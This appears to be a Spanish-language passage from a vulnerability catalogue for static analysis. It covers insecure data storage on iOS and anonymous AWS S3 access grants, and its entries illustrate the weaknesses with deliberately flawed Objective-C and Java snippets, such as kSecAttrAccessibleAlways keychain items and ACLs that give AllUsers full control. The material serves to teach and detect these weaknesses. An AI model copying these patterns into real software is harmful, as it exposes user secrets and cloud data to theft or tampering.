La API de protección de datos está diseñada para permitir que las aplicaciones declaren cuándo deben ser accesibles los elementos de llaves y los archivos almacenados en el sistema de archivos. Está disponible para la mayoría de API de archivo y base de datos, como NSFileManager, CoreData, NSData y SQLite. Al especificar una de las cuatro clases de protección para un determinado recurso, un desarrollador puede indicar al sistema de archivos subyacente que la cifre mediante una clave derivada del UID del dispositivo y del código de acceso del usuario, o mediante una clave basada exclusivamente en el UID del dispositivo. También debe indicar cuándo debe descifrarla automáticamente.

Las clases de protección de datos se definen para NSFileManager como constantes que deben asignarse como el valor de la clave NSFileProtectionKey en un NSDictionary asociado a la instancia de NSFileManager, y se pueden crear archivos o modificar su clase de protección de datos mediante el uso de funciones NSFileManager como setAttributes:ofItemAtPath:error:, attributesOfItemAtPath:error: y createFileAtPath:contents:attributes:. Además, las constantes de protección de datos correspondientes se definen para objetos NSData como NSDataWritingOptions que pueden pasarse como el argumento options a las funciones NSDatawriteToURL:options:error: y writeToFile:options:error:. Las definiciones de las diversas constantes de clases de protección de datos para NSFileManager y NSData son las siguientes:

-NSFileProtectionComplete, NSDataWritingFileProtectionComplete:
El recurso se almacena en un formato cifrado en el disco y no puede leerse ni escribirse mientras el dispositivo está bloqueado o arrancando.
Disponible en iOS 4.0 y posteriores.
-NSFileProtectionCompleteUnlessOpen, NSDataWritingFileProtectionCompleteUnlessOpen:
El recurso se almacena en un formato cifrado en el disco. Pueden crearse recursos mientras el dispositivo está bloqueado pero, cuando se cierra, ya no puede abrirse de nuevo hasta que el dispositivo esté desbloqueado. Si se abre el recurso mientras está desbloqueado, puede seguir teniendo acceso al recurso con normalidad incluso si el usuario bloquea el dispositivo.
Disponible en iOS 5.0 y posteriores.
-NSFileProtectionCompleteUntilFirstUserAuthentication, NSDataWritingFileProtectionCompleteUntilFirstUserAuthentication:
El recurso se almacena en un formato cifrado en el disco y no se puede tener acceso a él hasta que el dispositivo haya arrancado. La primera vez que el usuario desbloquea el dispositivo, la aplicación puede acceder al recurso y seguir teniendo acceso a él incluso si el usuario bloquea el dispositivo posteriormente.
Disponible en iOS 5.0 y posteriores.
-NSFileProtectionNone, NSDataWritingFileProtectionNone:
El recurso no tiene asociada ninguna protección especial. Se puede leer y escribir en él en cualquier momento.
Disponible en iOS 4.0 y posteriores.

De ese modo, si bien al marcar un archivo con NSFileProtectionCompleteUnlessOpen o NSFileProtectionCompleteUntilFirstUserAuthentication, se podrá cifrar con una clave derivada del código de acceso del usuario y del UID del dispositivo, los datos seguirán siendo accesibles en determinadas circunstancias. Por lo tanto, deben revisarse con atención los usos de NSFileProtectionCompleteUnlessOpen o NSFileProtectionCompleteUntilFirstUserAuthentication para determinar si se necesita mayor protección con NSFileProtectionComplete.

Ejemplo 1: en el siguiente ejemplo, el archivo solo está protegido hasta que el usuario enciende el dispositivo y proporciona el código de acceso por primera vez (hasta que vuelva a reiniciarse):

...
filepath = [self.GetDocumentDirectory stringByAppendingPathComponent:self.setFilename];
...
NSDictionary *protection = [NSDictionary dictionaryWithObject:NSFileProtectionCompleteUntilFirstUserAuthentication forKey:NSFileProtectionKey];
...
[[NSFileManager defaultManager] setAttributes:protection ofItemAtPath:filepath error:nil];
...
BOOL ok = [testToWrite writeToFile:filepath atomically:YES encoding:NSUnicodeStringEncoding error:&err];
...

Ejemplo 2: en el siguiente ejemplo, los datos solo están protegidos hasta que el usuario enciende el dispositivo y proporciona el código de acceso por primera vez (hasta que vuelva a reiniciarse):

...
filepath = [self.GetDocumentDirectory stringByAppendingPathComponent:self.setFilename];
...
NSData *textData = [textToWrite dataUsingEncoding:NSUnicodeStingEncoding];
...
BOOL ok = [textData writeToFile:filepath options:NSDataWritingFileProtectionCompleteUntilFirstUserAuthentication error:&err];
...

Las constantes de accesibilidad de las llaves están diseñadas para permitir que las aplicaciones indiquen cuándo se puede acceder a los elementos de las llaves. Al especificar una de las constantes de accesibilidad para un determinado elemento de las llaves, un desarrollador puede indicar al sistema de archivos subyacente que la cifre mediante una clave derivada del UID del dispositivo y del código de acceso del usuario, o mediante una clave basada exclusivamente en el UID del dispositivo. También debe indicar cuándo debe descifrarla automáticamente.

Las constantes de accesibilidad de las claves están diseñadas para asignarse como el valor para la clave kSecAttrAccessible en el diccionario de atributos de las claves. Las definiciones de las diversas constantes de accesibilidad de las claves son las siguientes:

-kSecAttrAccessibleAfterFirstUnlock:
No es posible acceder a los datos del elemento de las llaves después de un reinicio a menos que el usuario haya desbloqueado una vez el dispositivo.
Tras el primer desbloqueo, los datos permanecen accesibles hasta el próximo reinicio. Esta opción se recomienda para los elementos a los que deben tener acceso las aplicaciones en segundo plano. Los elementos con este atributo migran a un dispositivo nuevo cuando se usan copias de seguridad cifradas.
Disponible en iOS 4.0 y posteriores.

-kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly:
No es posible acceder a los datos del elemento de las llaves después de un reinicio a menos que el usuario haya desbloqueado una vez el dispositivo.
Tras el primer desbloqueo, los datos permanecen accesibles hasta el próximo reinicio. Esta opción se recomienda para los elementos a los que deben tener acceso las aplicaciones en segundo plano. Los elementos con este atributo no migran a un dispositivo nuevo. Por lo tanto, al realizar una restauración con una copia de seguridad de otro dispositivo, estos elementos no estarán presentes.
Disponible en iOS 4.0 y posteriores.

-kSecAttrAccessibleAlways:
Siempre se puede acceder a los datos del elemento de las llaves, independientemente de si el dispositivo está bloqueado.
No se recomienda usar esta opción con aplicaciones. Los elementos con este atributo migran a un dispositivo nuevo cuando se usan copias de seguridad cifradas.
Disponible en iOS 4.0 y posteriores.

-kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly:
Solo se puede acceder a los datos de las llaves cuando el dispositivo está desbloqueado. Solo está disponible si se configura un código de acceso en el dispositivo.
Esta opción se recomienda para los elementos a los que solo es necesario tener acceso mientras la aplicación está en primer plano. Los elementos con este atributo nunca migran a un dispositivo nuevo. Tras restaurar una copia de seguridad en un dispositivo nuevo, no se encuentran estos elementos. Ningún elemento puede almacenarse en esta clase en los dispositivos sin un código de acceso. Si se deshabilita el código de acceso del dispositivo, se eliminan todos los elementos de esta clase.
Disponible en iOS 8.0 y posteriores.

-kSecAttrAccessibleAlwaysThisDeviceOnly:
Siempre se puede acceder a los datos del elemento de las llaves, independientemente de si el dispositivo está bloqueado.
No se recomienda usar esta opción con aplicaciones. Los elementos con este atributo no migran a un dispositivo nuevo. Por lo tanto, al realizar una restauración con una copia de seguridad de otro dispositivo, estos elementos no estarán presentes.
Disponible en iOS 4.0 y posteriores.

-kSecAttrAccessibleWhenUnlocked:
Solo se puede acceder a los datos del elemento de las llaves mientras el dispositivo está desbloqueado por el usuario.
Esta opción se recomienda para los elementos a los que solo es necesario acceder mientras la aplicación está en primer plano. Los elementos con este atributo migran a un dispositivo nuevo cuando se usan copias de seguridad cifradas.
Este es el valor predeterminado para los elementos de las llaves que se agregan sin configurar de forma explícita una constante de accesibilidad.
Disponible en iOS 4.0 y posteriores.

-kSecAttrAccessibleWhenUnlockedThisDeviceOnly:
Solo se puede acceder a los datos del elemento de las llaves mientras el dispositivo está desbloqueado por el usuario.
Esta opción se recomienda para los elementos a los que solo es necesario acceder mientras la aplicación está en primer plano. Los elementos con este atributo no migran a un dispositivo nuevo. Por lo tanto, al realizar una restauración con una copia de seguridad de otro dispositivo, estos elementos no estarán presentes.
Disponible en iOS 4.0 y posteriores.

De ese modo, si bien al marcar un elemento de las llaves con kSecAttrAccessibleAfterFirstUnlock se podrá cifrar con una clave derivada del código de acceso del usuario y del UID del dispositivo, los datos seguirán siendo accesibles en determinadas circunstancias. Por lo tanto, deben revisarse con atención los usos de kSecAttrAccessibleAfterFirstUnlock para determinar si se necesita mayor protección.

Ejemplo 1: en el siguiente ejemplo, el elemento de las llaves determinado solo está protegido hasta que el usuario enciende el dispositivo y proporciona el código de acceso por primera vez (hasta el siguiente reinicio).

...
    NSMutableDictionary *dict = [NSMutableDictionary dictionary];
    NSData *token = [@"secret" dataUsingEncoding:NSUTF8StringEncoding];

    // Configure KeyChain Item
    [dict setObject:(__bridge id)kSecClassGenericPassword forKey:(__bridge id) kSecClass];
    [dict setObject:token forKey:(__bridge id)kSecValueData];
    ...
    [dict setObject:(__bridge id)kSecAttrAccessibleAfterFirstUnlock forKey:(__bridge id) kSecAttrAccessible];

    OSStatus error = SecItemAdd((__bridge CFDictionaryRef)dict, NULL);
...

La API de protección de datos está diseñada para permitir que las aplicaciones declaren cuándo deben ser accesibles los elementos de llaves y los archivos almacenados en el sistema de archivos. Está disponible para la mayoría de API de archivo y base de datos, como NSFileManager, CoreData, NSData y SQLite. Al especificar una de las cuatro clases de protección para un determinado recurso, un desarrollador puede indicar al sistema de archivos subyacente que la cifre mediante una clave derivada del UID del dispositivo y del código de acceso del usuario, o mediante una clave basada exclusivamente en el UID del dispositivo. También debe indicar cuándo debe descifrarla automáticamente.

Las clases de protección de datos se definen para NSFileManager como constantes que deben asignarse como el valor de la clave NSFileProtectionKey en un NSDictionary asociado a la instancia de NSFileManager, y se pueden crear archivos o modificar su clase de protección de datos mediante el uso de funciones NSFileManager como setAttributes:ofItemAtPath:error:, attributesOfItemAtPath:error: y createFileAtPath:contents:attributes:. Además, las constantes de protección de datos correspondientes se definen para objetos NSData como NSDataWritingOptions que pueden pasarse como el argumento options a las funciones NSDatawriteToURL:options:error: y writeToFile:options:error:. Las definiciones de las diversas constantes de clases de protección de datos para NSFileManager y NSData son las siguientes:

-NSFileProtectionComplete, NSDataWritingFileProtectionComplete:
El recurso se almacena en un formato cifrado en el disco y no puede leerse ni escribirse mientras el dispositivo está bloqueado o arrancando.
Disponible en iOS 4.0 y posteriores.
-NSFileProtectionCompleteUnlessOpen, NSDataWritingFileProtectionCompleteUnlessOpen:
El recurso se almacena en un formato cifrado en el disco. Pueden crearse recursos mientras el dispositivo está bloqueado pero, cuando se cierra, ya no puede abrirse de nuevo hasta que el dispositivo esté desbloqueado. Si se abre el recurso mientras está desbloqueado, puede seguir teniendo acceso al recurso con normalidad incluso si el usuario bloquea el dispositivo.
Disponible en iOS 5.0 y posteriores.
-NSFileProtectionCompleteUntilFirstUserAuthentication, NSDataWritingFileProtectionCompleteUntilFirstUserAuthentication:
El recurso se almacena en un formato cifrado en el disco y no se puede tener acceso a él hasta que el dispositivo haya arrancado. La primera vez que el usuario desbloquea el dispositivo, la aplicación puede acceder al recurso y seguir teniendo acceso a él incluso si el usuario bloquea el dispositivo posteriormente.
Disponible en iOS 5.0 y posteriores.
-NSFileProtectionNone, NSDataWritingFileProtectionNone:
El recurso no tiene asociada ninguna protección especial. Se puede leer y escribir en él en cualquier momento.
Disponible en iOS 4.0 y posteriores.

Aunque todos los archivos de un dispositivo con iOS, incluidos los que no tienen explícitamente asignada una clase de protección de datos, se almacenan en un formato cifrado, especificar NSFileProtectionNone provoca un cifrado con una clave derivada exclusivamente del UID del dispositivo. Esto permite que se pueda acceder a dichos archivos siempre que el dispositivo está encendido, incluso cuando está bloqueado con un código de acceso o durante el arranque. Por lo tanto, deben revisarse con atención los usos de NSFileProtectionNone para determinar si se necesita mayor protección con una clase de protección de datos más estricta.

Ejemplo 1: en el siguiente ejemplo, el archivo no está protegido (es accesible en todo momento cuando el dispositivo está encendido):

...
filepath = [self.GetDocumentDirectory stringByAppendingPathComponent:self.setFilename];
...
NSDictionary *protection = [NSDictionary dictionaryWithObject:NSFileProtectionNone forKey:NSFileProtectionKey];
...
[[NSFileManager defaultManager] setAttributes:protection ofItemAtPath:filepath error:nil];
...
BOOL ok = [testToWrite writeToFile:filepath atomically:YES encoding:NSUnicodeStringEncoding error:&err];
...

Ejemplo 2: en el siguiente ejemplo, los datos no están protegidos (son accesibles en todo momento cuando el dispositivo está encendido):

...
filepath = [self.GetDocumentDirectory stringByAppendingPathComponent:self.setFilename];
...
NSData *textData = [textToWrite dataUsingEncoding:NSUnicodeStingEncoding];
...
BOOL ok = [textData writeToFile:filepath options:NSDataWritingFileProtectionNone error:&err];
...

Las constantes de accesibilidad de las llaves están diseñadas para permitir que las aplicaciones indiquen cuándo se puede acceder a los elementos de las llaves. Al especificar una de las constantes de accesibilidad para un determinado elemento de las llaves, un desarrollador puede indicar al sistema de archivos subyacente que la cifre mediante una clave derivada del UID del dispositivo y del código de acceso del usuario, o mediante una clave basada exclusivamente en el UID del dispositivo. También debe indicar cuándo debe descifrarla automáticamente.

Las constantes de accesibilidad de las claves están diseñadas para asignarse como el valor para la clave kSecAttrAccessible en el diccionario de atributos de las claves. Las definiciones de las diversas constantes de accesibilidad de las claves son las siguientes:

-kSecAttrAccessibleAfterFirstUnlock:
No es posible acceder a los datos del elemento de las llaves después de un reinicio a menos que el usuario haya desbloqueado una vez el dispositivo.
Tras el primer desbloqueo, los datos permanecen accesibles hasta el próximo reinicio. Esta opción se recomienda para los elementos a los que deben tener acceso las aplicaciones en segundo plano. Los elementos con este atributo migran a un dispositivo nuevo cuando se usan copias de seguridad cifradas.
Disponible en iOS 4.0 y posteriores.

-kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly:
No es posible acceder a los datos del elemento de las llaves después de un reinicio a menos que el usuario haya desbloqueado una vez el dispositivo.
Tras el primer desbloqueo, los datos permanecen accesibles hasta el próximo reinicio. Esta opción se recomienda para los elementos a los que deben tener acceso las aplicaciones en segundo plano. Los elementos con este atributo no migran a un dispositivo nuevo. Por lo tanto, al realizar una restauración con una copia de seguridad de otro dispositivo, estos elementos no estarán presentes.
Disponible en iOS 4.0 y posteriores.

-kSecAttrAccessibleAlways:
Siempre se puede acceder a los datos del elemento de las llaves, independientemente de si el dispositivo está bloqueado.
No se recomienda usar esta opción con aplicaciones. Los elementos con este atributo migran a un dispositivo nuevo cuando se usan copias de seguridad cifradas.
Disponible en iOS 4.0 y posteriores.

-kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly:
Solo se puede acceder a los datos de las llaves cuando el dispositivo está desbloqueado. Solo está disponible si se configura un código de acceso en el dispositivo.
Esta opción se recomienda para los elementos a los que solo es necesario tener acceso mientras la aplicación está en primer plano. Los elementos con este atributo nunca migran a un dispositivo nuevo. Tras restaurar una copia de seguridad en un dispositivo nuevo, no se encuentran estos elementos. Ningún elemento puede almacenarse en esta clase en los dispositivos sin un código de acceso. Si se deshabilita el código de acceso del dispositivo, se eliminan todos los elementos de esta clase.
Disponible en iOS 8.0 y posteriores.

-kSecAttrAccessibleAlwaysThisDeviceOnly:
Siempre se puede acceder a los datos del elemento de las llaves, independientemente de si el dispositivo está bloqueado.
No se recomienda usar esta opción con aplicaciones. Los elementos con este atributo no migran a un dispositivo nuevo. Por lo tanto, al realizar una restauración con una copia de seguridad de otro dispositivo, estos elementos no estarán presentes.
Disponible en iOS 4.0 y posteriores.

-kSecAttrAccessibleWhenUnlocked:
Solo se puede acceder a los datos del elemento de las llaves mientras el dispositivo está desbloqueado por el usuario.
Esta opción se recomienda para los elementos a los que solo es necesario acceder mientras la aplicación está en primer plano. Los elementos con este atributo migran a un dispositivo nuevo cuando se usan copias de seguridad cifradas.
Este es el valor predeterminado para los elementos de las llaves que se agregan sin configurar de forma explícita una constante de accesibilidad.
Disponible en iOS 4.0 y posteriores.

-kSecAttrAccessibleWhenUnlockedThisDeviceOnly:
Solo se puede acceder a los datos del elemento de las llaves mientras el dispositivo está desbloqueado por el usuario.
Esta opción se recomienda para los elementos a los que solo es necesario acceder mientras la aplicación está en primer plano. Los elementos con este atributo no migran a un dispositivo nuevo. Por lo tanto, al realizar una restauración con una copia de seguridad de otro dispositivo, estos elementos no estarán presentes.
Disponible en iOS 4.0 y posteriores.

Aunque todos los archivos de un dispositivo con iOS, incluidos los que no tienen explícitamente asignada una constante de accesibilidad de las llaves, se almacenan en un formato cifrado, especificar kSecAttrAccessibleAlways provoca un cifrado con una llave derivada exclusivamente del UID del dispositivo. Esto permite que se pueda acceder a dichos archivos siempre que el dispositivo está encendido, incluso cuando está bloqueado con un código de acceso o durante el arranque. Por lo tanto, deben revisarse con atención los usos de kSecAttrAccessibleAlways para determinar si se necesita mayor protección con un nivel de accesibilidad de las llaves más estricto.

Ejemplo 1: en el siguiente ejemplo, el archivo determinado no está protegido (es decir, es accesible en todo momento cuando el dispositivo está encendido).

...
    NSMutableDictionary *dict = [NSMutableDictionary dictionary];
    NSData *token = [@"secret" dataUsingEncoding:NSUTF8StringEncoding];

    // Configure KeyChain Item
    [dict setObject:(__bridge id)kSecClassGenericPassword forKey:(__bridge id) kSecClass];
    [dict setObject:token forKey:(__bridge id)kSecValueData];
    ...
    [dict setObject:(__bridge id)kSecAttrAccessibleAlways forKey:(__bridge id) kSecAttrAccessible];

    OSStatus error = SecItemAdd((__bridge CFDictionaryRef)dict, NULL);
...

Otras aplicaciones pueden acceder a los archivos de aplicación en dispositivos con acceso root o en copias de seguridad sin cifrar. Dado que un usuario podría decidir liberar su dispositivo o realizar copias de seguridad sin cifrar, se recomienda cifrar las bases de datos que contengan datos confidenciales.

Ejemplo 1: El siguiente código establece una conexión con una base de datos Realm sin cifrar:

    Realm realm = Realm.getDefaultInstance();

Los archivos guardados en el álbum de fotos de iOS pueden ser leídos por cualquiera y todas las aplicaciones del dispositivo pueden tener acceso a ellos. Esto podría permitir a un usuario malintencionado robar fotos confidenciales, por ejemplo las imágenes de cheques utilizadas en los depósitos de cheques con dispositivos móviles.

Ejemplo 1: el siguiente código utiliza UIImageWriteToSavedPhotosAlbum para guardar las imágenes en el álbum de fotos:

- (void) imagePickerController:(UIImagePickerController *)picker didFinishPickingMediaWithInfo:(NSDictionary *)info
{
	// Access the uncropped image from info dictionary
	UIImage *image = [info objectForKey:UIImagePickerControllerOriginalImage];

  // Save image
  UIImageWriteToSavedPhotosAlbum(image, self, @selector(image:didFinishSavingWithError:contextInfo:), nil);

	...
}

Los niveles de accesibilidad de las llaves definen cuándo se descifran los elementos de las llaves y se quedan disponibles para las aplicaciones. Los niveles de accesibilidad posibles incluyen los siguientes:

-kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly:
No es posible acceder a los datos del elemento de las llaves después de un reinicio a menos que el usuario haya desbloqueado una vez el dispositivo.
Tras el primer desbloqueo, los datos permanecen accesibles hasta el próximo reinicio. Esta opción se recomienda para los elementos a los que deben tener acceso las aplicaciones en segundo plano. Los elementos con este atributo no migran a un dispositivo nuevo. Por lo tanto, al realizar una restauración con una copia de seguridad de otro dispositivo, estos elementos no estarán presentes.
Disponible en iOS 4.0 y posteriores.

-kSecAttrAccessibleAlways:
Siempre se puede acceder a los datos del elemento de las llaves, independientemente de si el dispositivo está bloqueado.
No se recomienda usar esta opción con aplicaciones. Los elementos con este atributo migran a un dispositivo nuevo cuando se usan copias de seguridad cifradas.
Disponible en iOS 4.0 y posteriores.

-kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly:
Solo se puede acceder a los datos de las llaves cuando el dispositivo está desbloqueado. Solo está disponible si se configura un código de acceso en el dispositivo.
Esta opción se recomienda para los elementos a los que solo es necesario tener acceso mientras la aplicación está en primer plano. Los elementos con este atributo nunca migran a un dispositivo nuevo. Tras restaurar una copia de seguridad en un dispositivo nuevo, no se encuentran estos elementos. Ningún elemento puede almacenarse en esta clase en los dispositivos sin un código de acceso. Si se deshabilita el código de acceso del dispositivo, se eliminan todos los elementos de esta clase.
Disponible en iOS 8.0 y posteriores.

-kSecAttrAccessibleAlwaysThisDeviceOnly:
Siempre se puede acceder a los datos del elemento de las llaves, independientemente de si el dispositivo está bloqueado.
No se recomienda usar esta opción con aplicaciones. Los elementos con este atributo no migran a un dispositivo nuevo. Por lo tanto, al realizar una restauración con una copia de seguridad de otro dispositivo, estos elementos no estarán presentes.
Disponible en iOS 4.0 y posteriores.

-kSecAttrAccessibleWhenUnlocked:
Solo se puede acceder a los datos del elemento de las llaves mientras el dispositivo está desbloqueado por el usuario.
Esta opción se recomienda para los elementos a los que solo es necesario acceder mientras la aplicación está en primer plano. Los elementos con este atributo migran a un dispositivo nuevo cuando se usan copias de seguridad cifradas.
Este es el valor predeterminado para los elementos de las llaves que se agregan sin configurar de forma explícita una constante de accesibilidad.
Disponible en iOS 4.0 y posteriores.

-kSecAttrAccessibleWhenUnlockedThisDeviceOnly:
Solo se puede acceder a los datos del elemento de las llaves mientras el dispositivo está desbloqueado por el usuario.
Esta opción se recomienda para los elementos a los que solo es necesario acceder mientras la aplicación está en primer plano. Los elementos con este atributo no migran a un dispositivo nuevo. Por lo tanto, al realizar una restauración con una copia de seguridad de otro dispositivo, estos elementos no estarán presentes.
Disponible en iOS 4.0 y posteriores.

Si los elementos de las llaves se almacenan con una directiva de seguridad razonable, como kSecAttrAccessibleWhenUnlocked, si luego roban su dispositivo y se establece un código de acceso, el ladrón deberá desbloquear el dispositivo para descifrar los elementos de las llaves. Si no se introduce el código de acceso correcto, se bloqueará el descifrado de los elementos de las llaves del dispositivo robado. Sin embargo, si no se establece un código de acceso, el atacante solo necesitará deslizar el dedo para desbloquear el dispositivo y obtener las llaves para descifrar sus elementos. Por lo tanto, no exigir un código de acceso en el dispositivo puede debilitar el mecanismo de cifrado de las llaves.

Ejemplo 1: en el siguiente ejemplo, el elemento de las llaves está protegido en todo momento, excepto cuando el dispositivo está encendido y desbloqueado, pero también está disponible si no se establece un código de acceso en el dispositivo:

...
    NSMutableDictionary *dict = [NSMutableDictionary dictionary];
    NSData *token = [@"secret" dataUsingEncoding:NSUTF8StringEncoding];

    // Configure KeyChain Item
    [dict setObject:(__bridge id)kSecClassGenericPassword forKey:(__bridge id) kSecClass];
    [dict setObject:token forKey:(__bridge id)kSecValueData];
    ...
    [dict setObject:(__bridge id)kSecAttrAccessibleWhenUnlockedThisDeviceOnly forKey:(__bridge id) kSecAttrAccessible];

    OSStatus error = SecItemAdd((__bridge CFDictionaryRef)dict, NULL);
...

Los portapapeles con nombre permiten a los desarrolladores compartir datos con otras partes de una aplicación o con otras aplicaciones que tienen el mismo ID de equipo. Configurar un portapapeles con nombre como persistente es una opción obsoleta que puede conducir a la exposición de datos confidenciales. Cuando un portapapeles se marca como persistente, los datos almacenados en el portapapeles se pueden guardar sin cifrar en el almacenamiento local y persisten al reiniciar las aplicaciones y el dispositivo.
Ejemplo 1: En el siguiente ejemplo, se crea un portapapeles con nombre y se configura como persistente invocando setPersistent:YES .

  ...
  UIPasteboard *pasteboard = [UIPasteboard pasteboardWithName:@"myPasteboard" create:YES];
  [pasteboard setPersistent:YES];
  ...

La concesión de acceso anónimo completo a un objeto o contenedor permite que los usuarios malintencionados lean el contenido o lo reemplacen con contenido malintencionado.

Ejemplo 1: El siguiente código define una Access Control Policy que concede acceso anónimo completo al contenedor foo.

    GetBucketAclRequest bucketAclReq = GetBucketAclRequest.builder().bucket("foo").build();
    GetBucketAclResponse getAclRes = s3.getBucketAcl(bucketAclReq);
    List<Grant> grants = getAclRes.grants();

    Grantee allusers = Grantee.builder().uri("http://acs.amazonaws.com/groups/global/AllUsers").build();
    Permission fc_permission = Permission.fromValue("FullControl");
    Grant grant = Grant.builder().grantee(allusers).permission(fc_permission).build();
    grants.add(grant);

    AccessControlPolicy acl = AccessControlPolicy.builder().grants(grants).build();

La concesión de un permiso anónimo para leer la política de control de acceso (ACP) de un objeto o contenedor permite que los usuarios malintencionados identifiquen los objetos que se pueden recuperar o reemplazar.

Ejemplo 1: El siguiente código define una Access Control Policy que concede un permiso anónimo de lectura de la ACP en el contenedor foo.

    GetBucketAclRequest bucketAclReq = GetBucketAclRequest.builder().bucket("foo").build();
    GetBucketAclResponse getAclRes = s3.getBucketAcl(bucketAclReq);
    List<Grant> grants = getAclRes.grants();

    Grantee allusers = Grantee.builder().uri("http://acs.amazonaws.com/groups/global/AllUsers").build();
    Permission fc_permission = Permission.fromValue("READ_ACP");
    Grant grant = Grant.builder().grantee(allusers).permission(fc_permission).build();
    grants.add(grant);

    AccessControlPolicy acl = AccessControlPolicy.builder().grants(grants).build();

La concesión de acceso anónimo de lectura a un objeto o contenedor permite que los usuarios malintencionados lean su contenido.

Ejemplo 1: El siguiente código define una Access Control Policy que concede acceso anónimo de lectura al contenedor foo.

    GetBucketAclRequest bucketAclReq = GetBucketAclRequest.builder().bucket("foo").build();
    GetBucketAclResponse getAclRes = s3.getBucketAcl(bucketAclReq);
    List<Grant> grants = getAclRes.grants();

    Grantee allusers = Grantee.builder().uri("http://acs.amazonaws.com/groups/global/AllUsers").build();
    Permission fc_permission = Permission.fromValue("Read");
    Grant grant = Grant.builder().grantee(allusers).permission(fc_permission).build();
    grants.add(grant);

    AccessControlPolicy acl = AccessControlPolicy.builder().grants(grants).build();

La concesión de un permiso anónimo para escribir en la política de control de acceso (ACP) de un objeto o contenedor permite que los usuarios malintencionados lean el contenido de dicho contenedor o que escriban en él.

Ejemplo 1: El siguiente código define una Access Control Policy que concede un permiso anónimo de escritura de la ACP en el contenedor foo.

    GetBucketAclRequest bucketAclReq = GetBucketAclRequest.builder().bucket("foo").build();
    GetBucketAclResponse getAclRes = s3.getBucketAcl(bucketAclReq);
    List<Grant> grants = getAclRes.grants();

    Grantee allusers = Grantee.builder().uri("http://acs.amazonaws.com/groups/global/AllUsers").build();
    Permission fc_permission = Permission.fromValue("WRITE_ACP");
    Grant grant = Grant.builder().grantee(allusers).permission(fc_permission).build();
    grants.add(grant);

    AccessControlPolicy acl = AccessControlPolicy.builder().grants(grants).build();

La concesión de acceso anónimo de escritura a un objeto o contenedor permite que los usuarios malintencionados reemplacen el contenido o que carguen contenido malintencionado.

Ejemplo 1: El siguiente código define una Access Control Policy que concede acceso anónimo de escritura al contenedor foo.

    GetBucketAclRequest bucketAclReq = GetBucketAclRequest.builder().bucket("foo").build();
    GetBucketAclResponse getAclRes = s3.getBucketAcl(bucketAclReq);
    List<Grant> grants = getAclRes.grants();

    Grantee allusers = Grantee.builder().uri("http://acs.amazonaws.com/groups/global/AllUsers").build();
    Permission fc_permission = Permission.fromValue("Write");
    Grant grant = Grant.builder().grantee(allusers).permission(fc_permission).build();
    grants.add(grant);

    AccessControlPolicy acl = AccessControlPolicy.builder().grants(grants).build();

La función identificada escribe datos en el portapapeles general sin excluirlos de la sincronización Universal Clipboard entre dispositivos a través de Handoff.

El contenido escrito en el portapapeles general se almacena de forma persistente en todos los reinicios del dispositivo, las desinstalaciones de aplicaciones y las restauraciones de aplicaciones. El uso del portapapeles general con la función Universal Clipboard habilitada aumenta el riesgo de robo o modificación de los datos del portapapeles como parte de un ataque de secuestro del portapapeles por parte de una aplicación maliciosa que se ejecuta en otro dispositivo.

Además, debido a que Universal Clipboard es compatible con dispositivos que ejecutan iOS 10 y posterior o macOS Sierra y posterior, los dispositivos compatibles que ejecutan un sistema operativo anterior que no contiene actualizaciones de privacidad y seguridad más recientes dirigidas a proteger el acceso no autorizado al portapapeles presentan una mayor amenaza.

Ejemplo 1: En el siguiente código, los datos se escriben en el portapapeles general configurando la propiedad items, que comparte por defecto el contenido del portapapeles entre los dispositivos del usuario mediante Universal Clipboard.

...
UIPasteboard *pasteboard = [UIPasteboard generalPasteboard];
NSDictionary *items = @{
    UTTypePlainText : sensitiveDataString,
    UTTypePNG : [UIImage imageWithData:medicalImageData]
};
[pasteboard setItems: @[items]];
...

Ejemplo 2: En el siguiente código, los datos se escriben en el portapapeles general llamando al método setObjects:localOnly:expirationDate: con el comportamiento Universal Clipboard explícitamente habilitado configurando el parámetro localOnly en NO.

...
UIPasteboard *pasteboard = [UIPasteboard generalPasteboard];
[pasteboard setObjects:@[sensitiveDataString, [UIImage imageWithData:medicalImageData]] 
            localOnly:NO 
            expirationDate:[NSDate distantFuture]];
...

Cuando se almacenan los datos en las llaves, es necesario configurar un nivel de accesibilidad que defina cuándo será posible acceder al elemento. Los niveles de accesibilidad posibles incluyen los siguientes:

-kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly:
No es posible acceder a los datos del elemento de las llaves después de un reinicio a menos que el usuario haya desbloqueado una vez el dispositivo.
Tras el primer desbloqueo, los datos permanecen accesibles hasta el próximo reinicio. Esta opción se recomienda para los elementos a los que deben tener acceso las aplicaciones en segundo plano. Los elementos con este atributo no migran a un dispositivo nuevo. Por lo tanto, al realizar una restauración con una copia de seguridad de otro dispositivo, estos elementos no estarán presentes.
Disponible en iOS 4.0 y posteriores.

-kSecAttrAccessibleAlways:
Siempre se puede acceder a los datos del elemento de las llaves, independientemente de si el dispositivo está bloqueado.
No se recomienda usar esta opción con aplicaciones. Los elementos con este atributo migran a un dispositivo nuevo cuando se usan copias de seguridad cifradas.
Disponible en iOS 4.0 y posteriores.

-kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly:
Solo se puede acceder a los datos de las llaves cuando el dispositivo está desbloqueado. Solo está disponible si se configura un código de acceso en el dispositivo.
Esta opción se recomienda para los elementos a los que solo es necesario tener acceso mientras la aplicación está en primer plano. Los elementos con este atributo nunca migran a un dispositivo nuevo. Tras restaurar una copia de seguridad en un dispositivo nuevo, no se encuentran estos elementos. Ningún elemento puede almacenarse en esta clase en los dispositivos sin un código de acceso. Si se deshabilita el código de acceso del dispositivo, se eliminan todos los elementos de esta clase.
Disponible en iOS 8.0 y posteriores.

-kSecAttrAccessibleAlwaysThisDeviceOnly:
Siempre se puede acceder a los datos del elemento de las llaves, independientemente de si el dispositivo está bloqueado.
No se recomienda usar esta opción con aplicaciones. Los elementos con este atributo no migran a un dispositivo nuevo. Por lo tanto, al realizar una restauración con una copia de seguridad de otro dispositivo, estos elementos no estarán presentes.
Disponible en iOS 4.0 y posteriores.

-kSecAttrAccessibleWhenUnlocked:
Solo se puede acceder a los datos del elemento de las llaves mientras el dispositivo está desbloqueado por el usuario.
Esta opción se recomienda para los elementos a los que solo es necesario acceder mientras la aplicación está en primer plano. Los elementos con este atributo migran a un dispositivo nuevo cuando se usan copias de seguridad cifradas.
